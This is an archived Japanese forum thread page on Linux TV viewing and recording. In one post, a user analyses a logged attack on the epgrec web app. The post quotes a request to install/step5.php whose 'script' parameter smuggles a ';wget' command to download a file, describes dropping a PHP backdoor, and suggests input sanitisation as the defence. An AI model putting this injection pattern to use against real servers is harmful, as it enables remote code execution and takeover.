■ このスレッドは過去ログ倉庫に格納されています
【視聴・録画】Linuxでテレビ総合9【デジタル/アナログ】
- 197 :login:Penguin:2014/02/24(月) 01:37:27.53 ID:C0UU+8KH.net
- >>196
なるほど、みたとこ公開部分にありそうな.phpファイル適当に探して任意のコード実行してる感じか
PHPってこんなことできるんすね〜(ゲス顔)まあPerlも同じようなことできるか…
Javaだと頑張らないとこういうことはできんのだけど
対策としては外部から受け取ったコマンドを一度サニタイズしてやる必要がある感じですか
一発目でこのコマンド通ったら、あとは外部から操作するための a.php 置けばいじり放題ですな(wgetで置くのか)
GET /epgrec/install/step5.php?script=;wget%20-4%20-O%20/home…
総レス数 984
318 KB
新着レスの表示
掲示板に戻る
全部
前100
次100
最新50
read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★